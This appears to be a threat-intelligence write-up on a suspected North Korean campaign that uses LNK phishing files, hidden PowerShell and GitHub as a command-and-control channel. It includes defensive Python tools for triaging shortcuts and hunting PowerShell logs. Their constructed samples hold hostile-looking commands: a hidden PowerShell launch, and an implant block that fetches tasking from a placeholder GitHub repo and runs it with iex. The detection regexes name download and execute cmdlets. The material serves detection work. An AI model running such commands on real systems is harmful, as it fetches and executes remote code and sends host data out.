[{"data":1,"prerenderedAt":151},["ShallowReactive",2],{"article-slug-north-korean-hackers-use-github-as-c2-in-south-korea-campaign":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":41,"sources":42,"events":58,"mitre_techniques":59,"mitre_mitigations":78,"d3fend_countermeasures":102,"iocs":111,"cyber_observables":112,"tags":134,"extract_datetime":140,"article_type":141,"impact_scope":142,"pub_date":149,"reading_time_minutes":150,"createdAt":140,"updatedAt":140},"d5e9de05-1d5d-43e0-a966-33532a3c516f","north-korean-hackers-use-github-as-c2-in-south-korea-campaign","North Korean Hackers Abuse GitHub for C2 in Campaign Targeting South Korea","North Korean Actors Use GitHub as Covert C2 in LNK-Based Malware Campaign","A sophisticated, multi-stage phishing campaign attributed to North Korean state-sponsored actors is targeting organizations in South Korea. The attackers use malicious Windows shortcut (LNK) files disguised as business documents to deliver a PowerShell-based payload. A key feature of the campaign is the abuse of GitHub as a command-and-control (C2) channel, allowing the malware to exfiltrate data and receive commands by communicating with attacker-controlled repositories. This tactic helps the malicious traffic blend in with legitimate web activity, evading detection. The campaign shows links to known North Korean groups like Kimsuky and Lazarus.","## Executive Summary\n\nSecurity researchers have identified an ongoing, stealthy malware campaign targeting organizations in South Korea, with strong evidence linking it to North Korean state-sponsored threat actors such as **[Kimsuky](https://attack.mitre.org/groups/G0094/)** and **[Lazarus Group](https://attack.mitre.org/groups/G0032/)**. The campaign leverages malicious Windows shortcut (`.lnk`) files, often delivered via phishing, as the initial infection vector. 
Upon execution, a hidden **[PowerShell](https://attack.mitre.org/techniques/T1059/001/)** script is run, which uses **[GitHub](https://github.com/)** as a command-and-control (C2) platform. By abusing the legitimate and widely trusted GitHub service, the attackers' C2 communications are camouflaged within normal network traffic and are hard to distinguish from legitimate developer activity. The ultimate goal of the campaign appears to be espionage and long-term intelligence gathering.\n\n---\n\n## Threat Overview\n\n**Attribution:** Suspected North Korean state-sponsored groups (Kimsuky, APT37, Lazarus).\n\nThis campaign demonstrates the continuing evolution of North Korean TTPs, focusing on stealth and the abuse of legitimate services:\n\n- **Initial Access:** Malicious LNK files ([`T1204.002 - Malicious File`](https://attack.mitre.org/techniques/T1204/002/)) delivered as phishing attachments ([`T1566.001 - Spearphishing Attachment`](https://attack.mitre.org/techniques/T1566/001/)). The files are disguised with the icons and names of common document types (e.g., PDFs) to trick users.\n- **Execution:** The LNK file contains obfuscated commands that launch a PowerShell script to perform the main malicious activities.\n- **Command and Control:** The most notable feature is the use of GitHub as a C2 channel ([`T1102.002 - Web Service: Bidirectional Communication`](https://attack.mitre.org/techniques/T1102/002/)). The PowerShell script communicates with attacker-controlled GitHub repositories, posting stolen data and pulling down new commands or payloads. This is a form of 'Living Off Trusted Sites' (LOTS).\n- **Defense Evasion:** By using PowerShell and GitHub, the attack minimizes its footprint on the infected system, and to security controls that classify traffic by destination its C2 looks like ordinary GitHub use.\n\n---\n\n## Technical Analysis\n\nThe attack unfolds in several stages:\n\n1.  **Delivery:** A user receives a malicious LNK file, likely as an email attachment or a download from a compromised site.\n2.  **Execution:** The user clicks the LNK file. 
The shortcut's target is a script host such as `powershell.exe`, and the command itself is carried in the shortcut's arguments field; Explorer's Properties dialog shows only the beginning of that field, so a long or whitespace-padded argument string is not visible without parsing the file. To maintain the guise, it also opens a legitimate-looking decoy document.\n3.  **C2 Communication:** The PowerShell script collects initial system information (e.g., hostname, username, IP address). It then makes API calls to GitHub, often creating or updating a file in a public or private repository controlled by the attacker, with the collected information encoded within.\n4.  **Tasking:** The script periodically polls the GitHub repository for new instructions. The attacker can update a file in the repository with new PowerShell commands, which the implant will then download and execute.\n5.  **Payload Delivery:** This C2 channel can be used to download further malware, such as Remote Access Trojans (RATs) like XenoRAT, for long-term control and more extensive data theft.\n\nRecent versions of the malware have shown increased obfuscation, removing metadata that previously linked them to North Korean actors and hiding C2 instructions more deeply within the LNK file's arguments.\n\n---\n\n## Impact Assessment\n\nThe primary goal of this campaign is espionage. By gaining a persistent foothold within South Korean organizations, the attackers can:\n\n- Collect political, military, and economic intelligence.\n- Steal intellectual property and sensitive corporate data.\n- Monitor communications of targeted individuals.\n- Use the compromised networks as a launchpad for further attacks.\n\nWhile not financially destructive in the way ransomware is, the long-term strategic damage from such intelligence gathering can be immense.\n\n---\n\n## Detection & Response\n\n**Detection Strategies:**\n1.  **PowerShell Logging:** Enable and monitor PowerShell script block logging (Windows Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). Look for obfuscated PowerShell commands and scripts that make web requests to `api.github.com`. Large script blocks are split across several 4104 events that share a ScriptBlock ID, so apply content rules to the reassembled block rather than to single events. 
This is a core component of **[D3FEND Process Analysis](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis)**.\n2.  **Network Traffic Analysis:** The traffic is HTTPS, so the repository and file paths are not visible to a firewall or proxy unless it inspects TLS; the destination hostname is, via DNS queries, the TLS SNI or proxy CONNECT logs. Alerting on processes connecting to `github.com` or `api.github.com` that are not known developer tools or web browsers can be an effective detection method. This is an application of **[D3FEND Network Traffic Analysis](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis)**.\n3.  **Endpoint Analysis:** Scan for LNK files with unusual target paths, especially those that contain `powershell.exe` or `cmd.exe`. EDR solutions can be configured to alert on the execution of PowerShell from a LNK file shortcut. A shortcut double-clicked in Explorer launches `powershell.exe` with `explorer.exe` as its parent, which is also true of any interactive launch, so pair the parent relationship with command-line indicators such as `-WindowStyle Hidden`, `-ExecutionPolicy Bypass` or `-EncodedCommand` (Event ID 4688 with command-line auditing enabled, or EDR process telemetry).\n\n**Response Actions:**\n- If detected, block network access to the specific GitHub repositories being used for C2. Blocking a single repository requires a TLS-inspecting proxy; DNS and firewall controls see only `github.com` and `api.github.com`, so decide whether to block those domains for the affected hosts.\n- Isolate the affected endpoint and analyze the PowerShell script to understand its full capabilities and what data may have been exfiltrated. Preserve the LNK file and the script block logs before the host is rebuilt; if the script embeds a GitHub API token, it identifies the account the attacker used.\n- Report the malicious repositories to GitHub for takedown.\n\n---\n\n## Mitigation\n\n1.  **Block LNK Attachments:** Configure email gateways to block or quarantine emails with LNK file attachments, including LNK files nested inside archive or disk-image attachments, as they have few legitimate use cases in email.\n2.  **Attack Surface Reduction (ASR) Rules:** Enable the Microsoft Defender ASR rule \"Block execution of potentially obfuscated scripts\" to prevent the execution of the malicious PowerShell. Deploy it in Block mode after a period in Audit mode; it targets obfuscation heuristics, not the GitHub traffic itself.\n3.  **User Training:** Educate users about the dangers of LNK files and to be suspicious of any unexpected document attachments.\n4.  **Restrict PowerShell Execution:** Use PowerShell Constrained Language Mode where possible, which limits the dangerous capabilities that can be invoked by scripts. It is enforced reliably only through an application control policy (WDAC or AppLocker); setting the `__PSLockdownPolicy` environment variable alone is trivially bypassed.","North Korean hackers are using GitHub as a covert C2 channel in a new campaign targeting South Korea. The attack uses malicious LNK files to run PowerShell scripts, blending in with legitimate traffic. 
🇰🇵 #CyberSecurity #ThreatIntel #NorthKorea #GitHub","North Korean state-sponsored hackers are using malicious LNK files and abusing GitHub as a command-and-control (C2) server in a stealthy espionage campaign targeting South Korea.",[13,14,15],"Threat Actor","Phishing","Cyberattack","high",[18,22,25,28,31,35,38],{"name":19,"type":20,"url":21},"Kimsuky","threat_actor","https://attack.mitre.org/groups/G0094/",{"name":23,"type":20,"url":24},"APT37","https://attack.mitre.org/groups/G0067/",{"name":26,"type":20,"url":27},"Lazarus Group","https://attack.mitre.org/groups/G0032/",{"name":29,"type":30},"GitHub","company",{"name":32,"type":33,"url":34},"PowerShell","technology","https://attack.mitre.org/techniques/T1059/001/",{"name":36,"type":37},"XenoRAT","malware",{"name":39,"type":40},"South Korea","other",[],[43,48,53],{"url":44,"title":45,"friendly_name":46,"website":47},"https://gbhackers.com/github-backed-malware-spread-via-lnk-files-in-south-korea/","GitHub-Backed Malware Spread via LNK Files in South Korea","GBHackers","gbhackers.com",{"url":49,"title":50,"friendly_name":51,"website":52},"https://cyberpress.com/github-hosted-malware-delivered-through-lnk-files-in-south-korea-attack-wave/","GitHub-Hosted Malware Delivered Through LNK Files In South Korea Attack Wave","Cyberpress","cyberpress.com",{"url":54,"title":55,"friendly_name":56,"website":57},"https://www.securityweek.com/north-korea-related-campaign-abuses-github-as-c2-in-new-lnk-phishing-attacks/","North Korea–Related Campaign Abuses GitHub as C2 in New LNK Phishing Attacks","SecurityWeek","securityweek.com",[],[60,64,68,70,74],{"id":61,"name":62,"tactic":63},"T1566.001","Spearphishing Attachment","Initial Access",{"id":65,"name":66,"tactic":67},"T1204.002","Malicious File","Execution",{"id":69,"name":32,"tactic":67},"T1059.001",{"id":71,"name":72,"tactic":73},"T1102.002","Web Service: Bidirectional Communication","Command and Control",{"id":75,"name":76,"tactic":77},"T1027","Obfuscated Files or Information","Defense Evasion",[79,89,98],{"id":80,"name":81,"d3fend_techniques":82,"description":87,"domain":88},"M1037","Filter Network Traffic",[83],{"id":84,"name":85,"url":86},"D3-OTF","Outbound Traffic Filtering","https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering","Filter outbound traffic to GitHub at the domain level for non-developer workstations to disrupt the C2 channel.","enterprise",{"id":90,"name":91,"d3fend_techniques":92,"description":97,"domain":88},"M1038","Execution Prevention",[93],{"id":94,"name":95,"url":96},"D3-SCF","System Call Filtering","https://d3fend.mitre.org/technique/d3f:SystemCallFiltering","Use Attack Surface Reduction (ASR) rules and PowerShell Constrained Language Mode to limit the capabilities of malicious scripts.",{"id":99,"name":100,"description":101,"domain":88},"M1017","User Training","Educate users to be suspicious of unexpected attachments, even if they appear to be documents.",[103,105],{"technique_id":84,"technique_name":85,"url":86,"recommendation":104,"mitre_mitigation_id":80},"The core of this attack's evasion is its use of GitHub for C2. While blocking GitHub entirely is not feasible for many organizations, granular outbound traffic filtering can be highly effective. Implement a proxy or firewall policy that restricts which devices can connect to `github.com` and `api.github.com`. Baseline first: package managers, software updaters and IDE extensions fetch releases from `github.com` on many hosts, but direct connections to `api.github.com` from non-developer users and servers are rare and usually have an identifiable owner. Limit this access to only developer workstations and build servers. For all other endpoints, block this traffic. This 'deny by default' posture for C2-like web services cripples the malware's ability to receive commands or exfiltrate data, leaving the implant without a working channel, although the initial execution still needs to be investigated.",{"technique_id":106,"technique_name":107,"url":108,"recommendation":109,"mitre_mitigation_id":110},"D3-PSA","PowerShell Script Analysis","https://d3fend.mitre.org/technique/d3f:PowerShellScriptAnalysis","This attack relies on executing obfuscated PowerShell from a LNK file. 
The key to detection is robust PowerShell logging and analysis. Ensure that PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) are enabled via Group Policy and that these logs are forwarded to your SIEM. Script block logging records each block as the engine receives it, so when an obfuscated first stage decodes and invokes a second stage, the decoded stage is logged as its own block; large blocks are split across several 4104 events that share a ScriptBlock ID and must be reassembled before matching. Create detection rules that look for suspicious script content, such as the download cmdlets and aliases (`Invoke-WebRequest`/`iwr`, `Invoke-RestMethod`/`irm`, `Net.WebClient`) paired with `api.github.com`, execution of fetched content via `Invoke-Expression`/`iex`, or scripts that perform system reconnaissance (`$env:COMPUTERNAME`, `$env:USERNAME`, `whoami`). This allows you to see past the obfuscation and detect the malware's true intent.","M1047",[],[113,118,124,129],{"type":114,"value":115,"description":116,"context":117,"confidence":16},"command_line_pattern","powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden","Common command-line pattern for silently executing a malicious PowerShell script, often found in the target property of a malicious LNK file.","EDR telemetry, Windows Event ID 4688 (with command-line auditing enabled)",{"type":119,"value":120,"description":121,"context":122,"confidence":123},"domain","api.github.com","The malware communicates with this domain for C2. Look for non-browser or non-developer tool processes making connections to it.","DNS logs, Web proxy logs, Netflow","medium",{"type":125,"value":126,"description":127,"context":128,"confidence":123},"file_name","*.lnk","The initial infection vector. Monitor for LNK files being created or downloaded in unusual locations (e.g., %TEMP%).","File integrity monitoring, EDR",{"type":130,"value":131,"description":132,"context":133,"confidence":16},"event_id","4104","PowerShell Script Block Logging event ID. 
This log source provides the full content of executed PowerShell scripts, even if obfuscated.","Windows PowerShell Log, SIEM",[135,19,136,29,137,138,32,139,39],"North Korea","Lazarus","C2","LNK file","espionage","2026-04-06T15:00:00.000Z","Analysis",{"geographic_scope":143,"countries_affected":144,"industries_affected":145},"national",[39],[146,147,148],"Government","Defense","Technology","2026-04-06",5,1775683836148]
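The Technical Analysis (step 2) and the Endpoint Analysis detection strategy above both turn on what is inside the shortcut file: a script-host target, the arguments field that carries the command, and the fact that Explorer's Properties dialog does not show all of it. The following is an added example, not code from the article or from the reporting it summarizes: a minimal parser for the Shell Link header and StringData fields (per MS-SHLLINK) plus a triage function that applies the article's indicators, including the IOC command-line pattern. The `build_lnk` helper, the placeholder `<owner>/<repo>` URL and the 300-space padding are constructed test inputs, not artifacts from the campaign.

```python
import re
import struct

# Shell Link (MS-SHLLINK) constants; only the fields this parser needs.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the window minimized and unfocused
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))  # StringData appears in this fixed order


def _read_string(buf, pos, unicode):
    """One StringData entry: CountCharacters (uint16) then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    width = 2 if unicode else 1
    raw = buf[pos:pos + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    return raw.decode("utf-16-le" if unicode else "latin-1"), pos + count * width


def parse_lnk(buf):
    """Return ShowCommand and every StringData field present in an LNK blob."""
    if len(buf) < HEADER_SIZE or buf[:4] != b"\x4c\x00\x00\x00" or buf[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)         # LinkFlags
    (show_command,) = struct.unpack_from("<I", buf, 60)  # ShowCommand
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                  # IDListSize (uint16) + ItemIDList
        (size,) = struct.unpack_from("<H", buf, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                            # LinkInfoSize (uint32) includes itself
        (size,) = struct.unpack_from("<I", buf, pos)
        pos += size
    fields = {"show_command": show_command}
    for name, flag in STRING_FIELDS:
        if flags & flag:
            fields[name], pos = _read_string(buf, pos, bool(flags & IS_UNICODE))
    return fields


def triage(fields):
    """Apply the article's LNK indicators to a parsed shortcut; returns (suspicious, reasons)."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "")
    low = args.lower()
    if re.search(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", target):
        reasons.append("target is a script host: " + target.rsplit("\\", 1)[-1])
    for flag in ("-executionpolicy bypass", "-noprofile", "-windowstyle hidden", "-encodedcommand", " -enc "):
        if flag in low:
            reasons.append("argument: " + flag.strip())
    if "github.com" in low:
        reasons.append("argument references github.com")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (console window starts minimized)")
    if re.search(r"\s{64,}", args):
        reasons.append(f"{len(args)}-char argument string padded with whitespace "
                       "(pushes the command out of the Explorer Target box)")
    return len(reasons) >= 2, reasons  # one indicator alone is common in legitimate admin shortcuts


def build_lnk(relative_path, arguments, show_command=1):
    """Constructed minimal LNK for testing: header plus RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Not a real campaign sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)


PS_PATH = "..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed samples: the command-line pattern from the IOC list, padded with 300 spaces and
# polling a placeholder repository URL; and an ordinary shortcut to Notepad for contrast.
MALICIOUS_LNK = build_lnk(
    PS_PATH,
    " " * 300 + "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
    "-Command \"iwr https://api.github.com/repos/<owner>/<repo>/contents/tasking\"",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk("..\\..\\Windows\\System32\\notepad.exe", "report.txt")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        suspicious, reasons = triage(parse_lnk(blob))
        print(f"{label}: suspicious={suspicious}", *reasons, sep="\n  ")
```

Run it against files collected from `%TEMP%` or mail quarantine rather than opening them in Explorer: the parser reads the whole arguments field, whereas the Properties dialog truncates the Target box, which is exactly what whitespace padding exploits. Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, so the target path may only be available from `relative_path` or, for shortcuts that omit it, would need the ItemIDList decoded as well.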
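The PowerShell Logging detection strategy, the D3-PSA recommendation and the 4104 observable above all come down to running content rules over script block logs, with the caveat that large blocks arrive as several 4104 events. The following is an added example, not code from the article or from the campaign reporting: it parses the 4104 message text as rendered in the Microsoft-Windows-PowerShell/Operational log, reassembles chunks by ScriptBlock ID, and applies rules for the fetch-from-GitHub pattern; the rule set extends the article's `Invoke-WebRequest`/`iwr` example to the other built-in download cmdlets and aliases, and the token rule assumes that writes to the GitHub API carry a token in the `Authorization` header. The `EventID`/`Message` record shape, the GUIDs, the placeholder `<owner>/<repo>` URL and the `ci.corp.example` developer script are constructed sample input.

```python
import re
from collections import defaultdict

# Message layout of Microsoft-Windows-PowerShell/Operational event 4104.
MSG_RE = re.compile(
    r"Creating Scriptblock text \((\d+) of (\d+)\):\r?\n(.*?)\r?\n\r?\n"
    r"ScriptBlock ID: ([0-9a-fA-F-]{36})\r?\nPath: (.*)\Z", re.S)

# Content rules. The fetch list extends the article's iwr/Invoke-WebRequest example with the
# other built-in ways a script pulls from the web; the token rule assumes API writes are
# authenticated with a GitHub token in the Authorization header.
RULES = {
    "web_fetch": re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
                            r"Net\.WebClient|DownloadString|DownloadFile)\b", re.I),
    "github": re.compile(r"\b(api\.github\.com|github\.com|raw\.githubusercontent\.com)\b", re.I),
    "recon": re.compile(r"\$env:(COMPUTERNAME|USERNAME)\b|\bwhoami\b|Win32_ComputerSystem", re.I),
    "exec_fetched": re.compile(r"\b(Invoke-Expression|iex)\b|\[scriptblock\]::Create", re.I),
    "api_token": re.compile(r"Authorization.{0,40}\b(token|Bearer)\b", re.I),
}


def parse_4104(message):
    """Split one 4104 message into its part number, chunk text, ScriptBlock ID and Path."""
    m = MSG_RE.match(message)
    if not m:
        raise ValueError("not a 4104 script-block message")
    part, total, text, sb_id, path = m.groups()
    return {"part": int(part), "total": int(total), "text": text, "id": sb_id, "path": path}


def score(text):
    """Returns (alert, hits). A GitHub reference alone is not an alert: it must co-occur with a
    web fetch, host recon or an API token, or a fetch must be paired with executing what it fetched."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    alert = bool(("github" in hits and hits & {"web_fetch", "recon", "api_token"})
                 or {"web_fetch", "exec_fetched"} <= hits)
    return alert, sorted(hits)


def reassemble(events):
    """Join chunks per ScriptBlock ID in part order; 'complete' is False if any chunk is missing."""
    chunks, meta = defaultdict(dict), {}
    for ev in events:
        if ev.get("EventID") != 4104:  # 4103 module logs and other events are not script blocks
            continue
        rec = parse_4104(ev["Message"])
        chunks[rec["id"]][rec["part"]] = rec["text"]
        meta[rec["id"]] = (rec["path"], rec["total"])
    return {sb_id: {"path": meta[sb_id][0],
                    "complete": len(parts) == meta[sb_id][1],
                    "text": "".join(parts[i] for i in sorted(parts))}
            for sb_id, parts in chunks.items()}


def hunt(events):
    """Alerts keyed by ScriptBlock ID, evaluated on the reassembled block."""
    alerts = {}
    for sb_id, blk in reassemble(events).items():
        alert, hits = score(blk["text"])
        if alert:
            alerts[sb_id] = hits
    return alerts


def hunt_per_event(events):
    """The naive approach, for comparison: rules run on each 4104 event in isolation."""
    return {parse_4104(ev["Message"])["id"] for ev in events
            if ev.get("EventID") == 4104 and score(parse_4104(ev["Message"])["text"])[0]}


def _msg(part, total, text, sb_id, path=""):
    """Render a chunk the way the Operational log does (constructed sample text)."""
    return (f"Creating Scriptblock text ({part} of {total}):\r\n{text}\r\n\r\n"
            f"ScriptBlock ID: {sb_id}\r\nPath: {path}")


IMPLANT_ID = "1a2b3c4d-0000-4000-8000-000000000001"  # constructed GUIDs
DEV_ID = "1a2b3c4d-0000-4000-8000-000000000002"
# Constructed events with the EventID/Message fields a SIEM would normalize: the implant-style
# block is split across two 4104 records, as the log does for large blocks, and the last record
# is an ordinary developer script that fetches from an internal CI server.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Message": _msg(1, 2,
        "$h = $env:COMPUTERNAME; $u = $env:USERNAME\r\n"
        "$r = (iwr -UseBasicParsing -Headers @{Authorization='token <placeholder>'} `\r\n",
        IMPLANT_ID)},
    {"EventID": 4103, "Message": "CommandInvocation(Invoke-WebRequest): ..."},
    {"EventID": 4104, "Message": _msg(2, 2,
        "    -Uri 'https://api.github.com/repos/<owner>/<repo>/contents/tasking').Content\r\n"
        "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r)))",
        IMPLANT_ID)},
    {"EventID": 4104, "Message": _msg(1, 1,
        "$resp = Invoke-RestMethod -Uri 'https://ci.corp.example/api/builds/latest'\r\n"
        "Write-Host \"Build $($resp.id) is $($resp.status)\"",
        DEV_ID, "C:\\Scripts\\check-build.ps1")},
]

if __name__ == "__main__":
    print("reassembled:", hunt(SAMPLE_EVENTS))           # flags the implant block
    print("per-event:  ", hunt_per_event(SAMPLE_EVENTS))  # misses it: the indicators span two chunks
```

The point of the comparison is the split block: `iwr` and the recon land in part 1, `api.github.com` and `iex` in part 2, so per-event matching never sees the combination and the developer script with a single `Invoke-RestMethod` would be the only thing left to chase. An empty `Path` is itself worth noting, since a block passed on the command line (as from a shortcut) has no script file behind it.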